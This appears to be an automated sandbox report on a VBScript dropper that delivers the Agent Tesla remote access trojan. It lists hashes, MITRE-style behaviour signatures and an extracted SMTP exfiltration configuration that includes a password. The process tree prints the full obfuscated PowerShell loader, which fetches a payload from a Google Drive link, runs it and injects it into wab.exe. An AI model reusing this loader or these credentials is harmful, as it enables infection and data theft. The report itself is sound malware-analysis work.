Analysis
-
max time kernel
144s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
22-05-2024 11:27
Static task
static1
Behavioral task
behavioral1
Sample
d14ef42bd2f3ecb7ff2e7ea8b7fd79b06f5b048c2f181381b5f8b790b7228f3b.vbs
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
d14ef42bd2f3ecb7ff2e7ea8b7fd79b06f5b048c2f181381b5f8b790b7228f3b.vbs
Resource
win10v2004-20240426-en
General
-
Target
d14ef42bd2f3ecb7ff2e7ea8b7fd79b06f5b048c2f181381b5f8b790b7228f3b.vbs
-
Size
5KB
-
MD5
62bc79cdf5d55f891ae6d2a662cb87fc
-
SHA1
2ab352feb12da98eca4c5ec9ce4b349f5731ab50
-
SHA256
d14ef42bd2f3ecb7ff2e7ea8b7fd79b06f5b048c2f181381b5f8b790b7228f3b
-
SHA512
1335d32fa999b5f3729f0b94caf214e09b78c9f3108c05e8fb6fddb828f7d8049a17c2e1b72ca12203ebdda0141d22c326e1986057677fdb9efe6970638c7db2
-
SSDEEP
96:QsLisJvmYz2W6/F5J9eI8L7YMH8NJPW0agOVTLU5VFPB5Gv9rmJ/pCz6cfp:QJs7R6/F53IYG8NJu0aTV/cFaFrmxpCv
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.medicalhome.com.pe - Port:
587 - Username:
[email protected] - Password:
MHinfo01 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2504 powershell.exe 7 2504 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
wab.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\GrOcCQC = "C:\\Users\\Admin\\AppData\\Roaming\\GrOcCQC\\GrOcCQC.exe" wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 13 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 1452 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2428 powershell.exe 1452 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2428 set thread context of 1452 2428 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 2504 powershell.exe 2428 powershell.exe 2428 powershell.exe 1452 wab.exe 1452 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2428 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 2504 powershell.exe Token: SeDebugPrivilege 2428 powershell.exe Token: SeDebugPrivilege 1452 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 3040 wrote to memory of 2504 3040 WScript.exe powershell.exe PID 3040 wrote to memory of 2504 3040 WScript.exe powershell.exe PID 3040 wrote to memory of 2504 3040 WScript.exe powershell.exe PID 2504 wrote to memory of 2584 2504 powershell.exe cmd.exe PID 2504 wrote to memory of 2584 2504 powershell.exe cmd.exe PID 2504 wrote to memory of 2584 2504 powershell.exe cmd.exe PID 2504 wrote to memory of 2428 2504 powershell.exe powershell.exe PID 2504 wrote to memory of 2428 2504 powershell.exe powershell.exe PID 2504 wrote to memory of 2428 2504 powershell.exe powershell.exe PID 2504 wrote to memory of 2428 2504 powershell.exe powershell.exe PID 2428 wrote to memory of 2812 2428 powershell.exe cmd.exe PID 2428 wrote to memory of 2812 2428 powershell.exe cmd.exe PID 2428 wrote to memory of 2812 2428 powershell.exe cmd.exe PID 2428 wrote to memory of 2812 2428 powershell.exe cmd.exe PID 2428 wrote to memory of 1452 2428 powershell.exe wab.exe PID 2428 wrote to memory of 1452 2428 powershell.exe wab.exe PID 2428 wrote to memory of 1452 2428 powershell.exe wab.exe PID 2428 wrote to memory of 1452 2428 powershell.exe wab.exe PID 2428 wrote to memory of 1452 2428 powershell.exe wab.exe PID 2428 wrote to memory of 1452 2428 powershell.exe wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d14ef42bd2f3ecb7ff2e7ea8b7fd79b06f5b048c2f181381b5f8b790b7228f3b.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ramon='Sub';$Ramon+='strin';$Rkkeudviklingers = 1;$Ramon+='g';Function menuetter($Fusicladium){$Nationalitetsmrkers=$Fusicladium.Length-$Rkkeudviklingers;For($Grindehval=1;$Grindehval -lt $Nationalitetsmrkers;$Grindehval+=2){$Rejektioner+=$Fusicladium.$Ramon.Invoke( $Grindehval, $Rkkeudviklingers);}$Rejektioner;}function Birthed14($Taalbond24){& ($Psychologism) ($Taalbond24);}$Dybfrosnes=menuetter ' M o,zCiSlmlAa./,5S.K0. (GWNiInFdFo,wOs NN T .1R0C. 0H;L WPiInM6s4 ;T BxP6P4.;. rEv,:,1D2P1a.S0I). .GCeLcOkKo,/ 2D0F1B0.0 1,0E1 HFRi rBePfSo,x,/C1 2S1,.K0O ';$Emigreringers=menuetter ' U sMe r.- Asg.eKnTtM ';$Grundvandsreservoirets=menuetter ' h.tStAp s : /M/KdUr,iovHe,. gAocoEgAl.eA.ScDo ml/LuPc,?He x,pJoDr t,=PdOoCw,n lHo aUd &Bi d = 1O-CydPMM,F K.R u.FSL.JCkUcBf 2eLKzRs,_OlPmCH m.E j,QHo l u,c 2tf. ';$Infructuose=menuetter 'G>g ';$Psychologism=menuetter ' i eFxa ';$Wrightry='Danoranja';$Leukoctyoid = menuetter ' eAc hLoD K%Ua p.pHdVaGt ak%U\SM i a uBl.e d .,B.iNo. .&E& Ue,c.h.oP Ot, ';Birthed14 (menuetter '.$ g lMo b a l :.S mTu d spt.i.tslAeSrOnme sS=S(Ac m db /Pch $ L,eTuRkGoScnt,y,o,i d )S ');Birthed14 (menuetter ' $ g.lMoDb,aRlK:LUeg e,n.t l iTgG= $ G r uRnBd vPaPnpd s.r.e s eFrPvFoMiar,eSt,sM.rsLpCl iAt (A$AI.nAfBr uJc,tSu.o.sPe )F ');$Grundvandsreservoirets=$Ugentlig[0];$Elderwood= (menuetter ' $ g l o.b aBlS:CBFlHaFc,k.g uDaFrSdc= NFeKwD- O b.jMeFcUt. S yRs t.e mP. N e.ta..W eRbCC.l,iUePn t');$Elderwood+=$Smudstitlernes[1];Birthed14 ($Elderwood);Birthed14 (menuetter ' $ BTlCa cFkDg uBadr d .kHDeSaJdce rFsM[U$ E,m,iEgUrSe r,iAn,gCetr s,] =D$ DYyBb fFr oVsTnAeRsP ');$Afsones=menuetter 'M$CBPlNaAc k.gPu aRr d.. D odwBnSl o,a d FMiTl,eL( $SG,r,u n dAv a n dOs rBeSsCe r vSo,isrDeFt s,,m$.UNg uNd eSl,iTgPhVe dR)D ';$Ugudelighed=$Smudstitlernes[0];Birthed14 (menuetter ',$ gIl.oRb a l :.v e n,sHkPaDb.eBr,sV=B(,TAe sBtR-TP aRtch D$kU gbuMdSe.lSi g.h ePd ) ');while (!$venskabers) {Birthed14 (menuetter 'F$Ug,lPo.bGaMl :AE r,eBl oAnTgR= $ t rIu eG ') ;Birthed14 $Afsones;Birthed14 (menuetter ',SLttaMrgt.- SCl.e,eRpA D4k ');Birthed14 (menuetter 'D$Tg l oFb aNlF:BvRe,nesck.aZbSe r sC=.( T e sRtS-RPDaAtKh $HU.g u.dFe.l,img.hPe.ds). ') ;Birthed14 (menuetter ',$FgMl o bPa lH: S,tTi.vTeTr.eBnS= $.g l.o.bBa lT:CMDaOl,tTy,+F+C%K$HUNgSeUn tMlFi g..Sc o.u nStD ') ;$Grundvandsreservoirets=$Ugentlig[$Stiveren];}$Underindeksets=367934;$Opsamling=26710;Birthed14 (menuetter ' $Fg l oKbEa.l :.M iWl.iKeSuLb e s.kly,tSt ePl sSe sAiDnHtLePrReTs s.e.r.nBeMsS U= IG eTtu- CBo,n tHe,n t U$RU g u,d e.l,iDg hSe.d ');Birthed14 (menuetter ' $.gIlNoGbUa.lM:ApPe rRq u,i sNiDtAe sU e=, [ S y s t e mV. CLo.n.vPeIr tT]K:S:KF,r,oRmFBMaSsUeG6S4 SPtyrOi.nFgT(d$.MTiJl iSe uEbBe sSk.y tStReBl sCe,s iNn tGeFr,e s sfe.r noe sj) ');Birthed14 (menuetter '.$ZgAl,oIb aTlS:.P r,iEn tSeFrEp,r,oIgPrTaEm m e,r sN O=R ,[SSiy sDt,e.mE.,T e x tC. EEn.cSoSd i nIg.],:,: AOS,C I I . GGeOtSS.tBr i n g,(.$,pSe.r.q u iBsaibtpegs ), ');Birthed14 (menuetter 'S$,gMl oBbAa,lG:NRAeGvPe.lCa.bDi l.i t y.=J$sP r.idnNt,eGrFp.rCoHgErEa mSm eArEs,. sGu b sLt.rMi nhg.(O$,UCnYd ePrGiDnFd etkRste tcs ,O$TO,pIsFalm.l i.n,gS) ');Birthed14 $Revelability;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Miauled.Bio && echo t"3⤵PID:2584
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ramon='Sub';$Ramon+='strin';$Rkkeudviklingers = 1;$Ramon+='g';Function menuetter($Fusicladium){$Nationalitetsmrkers=$Fusicladium.Length-$Rkkeudviklingers;For($Grindehval=1;$Grindehval -lt $Nationalitetsmrkers;$Grindehval+=2){$Rejektioner+=$Fusicladium.$Ramon.Invoke( $Grindehval, $Rkkeudviklingers);}$Rejektioner;}function Birthed14($Taalbond24){& ($Psychologism) ($Taalbond24);}$Dybfrosnes=menuetter ' M o,zCiSlmlAa./,5S.K0. (GWNiInFdFo,wOs NN T .1R0C. 0H;L WPiInM6s4 ;T BxP6P4.;. rEv,:,1D2P1a.S0I). .GCeLcOkKo,/ 2D0F1B0.0 1,0E1 HFRi rBePfSo,x,/C1 2S1,.K0O ';$Emigreringers=menuetter ' U sMe r.- Asg.eKnTtM ';$Grundvandsreservoirets=menuetter ' h.tStAp s : /M/KdUr,iovHe,. gAocoEgAl.eA.ScDo ml/LuPc,?He x,pJoDr t,=PdOoCw,n lHo aUd &Bi d = 1O-CydPMM,F K.R u.FSL.JCkUcBf 2eLKzRs,_OlPmCH m.E j,QHo l u,c 2tf. ';$Infructuose=menuetter 'G>g ';$Psychologism=menuetter ' i eFxa ';$Wrightry='Danoranja';$Leukoctyoid = menuetter ' eAc hLoD K%Ua p.pHdVaGt ak%U\SM i a uBl.e d .,B.iNo. .&E& Ue,c.h.oP Ot, ';Birthed14 (menuetter '.$ g lMo b a l :.S mTu d spt.i.tslAeSrOnme sS=S(Ac m db /Pch $ L,eTuRkGoScnt,y,o,i d )S ');Birthed14 (menuetter ' $ g.lMoDb,aRlK:LUeg e,n.t l iTgG= $ G r uRnBd vPaPnpd s.r.e s eFrPvFoMiar,eSt,sM.rsLpCl iAt (A$AI.nAfBr uJc,tSu.o.sPe )F ');$Grundvandsreservoirets=$Ugentlig[0];$Elderwood= (menuetter ' $ g l o.b aBlS:CBFlHaFc,k.g uDaFrSdc= NFeKwD- O b.jMeFcUt. S yRs t.e mP. N e.ta..W eRbCC.l,iUePn t');$Elderwood+=$Smudstitlernes[1];Birthed14 ($Elderwood);Birthed14 (menuetter ' $ BTlCa cFkDg uBadr d .kHDeSaJdce rFsM[U$ E,m,iEgUrSe r,iAn,gCetr s,] =D$ DYyBb fFr oVsTnAeRsP ');$Afsones=menuetter 'M$CBPlNaAc k.gPu aRr d.. D odwBnSl o,a d FMiTl,eL( $SG,r,u n dAv a n dOs rBeSsCe r vSo,isrDeFt s,,m$.UNg uNd eSl,iTgPhVe dR)D ';$Ugudelighed=$Smudstitlernes[0];Birthed14 (menuetter ',$ gIl.oRb a l :.v e n,sHkPaDb.eBr,sV=B(,TAe sBtR-TP aRtch D$kU gbuMdSe.lSi g.h ePd ) ');while (!$venskabers) {Birthed14 (menuetter 'F$Ug,lPo.bGaMl :AE r,eBl oAnTgR= $ t rIu eG ') ;Birthed14 $Afsones;Birthed14 (menuetter ',SLttaMrgt.- SCl.e,eRpA D4k ');Birthed14 (menuetter 'D$Tg l oFb aNlF:BvRe,nesck.aZbSe r sC=.( T e sRtS-RPDaAtKh $HU.g u.dFe.l,img.hPe.ds). ') ;Birthed14 (menuetter ',$FgMl o bPa lH: S,tTi.vTeTr.eBnS= $.g l.o.bBa lT:CMDaOl,tTy,+F+C%K$HUNgSeUn tMlFi g..Sc o.u nStD ') ;$Grundvandsreservoirets=$Ugentlig[$Stiveren];}$Underindeksets=367934;$Opsamling=26710;Birthed14 (menuetter ' $Fg l oKbEa.l :.M iWl.iKeSuLb e s.kly,tSt ePl sSe sAiDnHtLePrReTs s.e.r.nBeMsS U= IG eTtu- CBo,n tHe,n t U$RU g u,d e.l,iDg hSe.d ');Birthed14 (menuetter ' $.gIlNoGbUa.lM:ApPe rRq u,i sNiDtAe sU e=, [ S y s t e mV. CLo.n.vPeIr tT]K:S:KF,r,oRmFBMaSsUeG6S4 SPtyrOi.nFgT(d$.MTiJl iSe uEbBe sSk.y tStReBl sCe,s iNn tGeFr,e s sfe.r noe sj) ');Birthed14 (menuetter '.$ZgAl,oIb aTlS:.P r,iEn tSeFrEp,r,oIgPrTaEm m e,r sN O=R ,[SSiy sDt,e.mE.,T e x tC. EEn.cSoSd i nIg.],:,: AOS,C I I . GGeOtSS.tBr i n g,(.$,pSe.r.q u iBsaibtpegs ), ');Birthed14 (menuetter 'S$,gMl oBbAa,lG:NRAeGvPe.lCa.bDi l.i t y.=J$sP r.idnNt,eGrFp.rCoHgErEa mSm eArEs,. sGu b sLt.rMi nhg.(O$,UCnYd ePrGiDnFd etkRste tcs ,O$TO,pIsFalm.l i.n,gS) ');Birthed14 $Revelability;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Miauled.Bio && echo t"4⤵PID:2812
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
513KB
MD55b57c4407f9d0632c096d9a498cae912
SHA147b678f24bd4058986a9d87e06fe3826bda70f65
SHA2564d198b43eb5c549aca827741cbb753ddb35bb444cb0599a8afe355f110d74fe6
SHA512bffa2c0c420bd29fca818d9acbd60a637e8f51dbdc789d26decf7169cda9f641deeba8e89aef9ecb74be67c4cb3080269650b55e70da7d1aa095169e4d43f670
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J9WV6BIU85D5RV9J72GN.temp
Filesize7KB
MD5ae0ec0c0f8b0b4c8df84d26a7f54107e
SHA1a2239d6bed8fd789662b6262774d455036efcbe3
SHA25697b434135c7ef82aaa971fe1faa04532488eeebe296a7d6851b445494c7c0d4d
SHA5128ebf77943cb95496ab1fde22b44d9907d66baefe26f7e93082e5e26fba16aeabd05072d45ea26286e31d32edd7a79b0ce22841cccb0fab030fb1cd2fdca3575e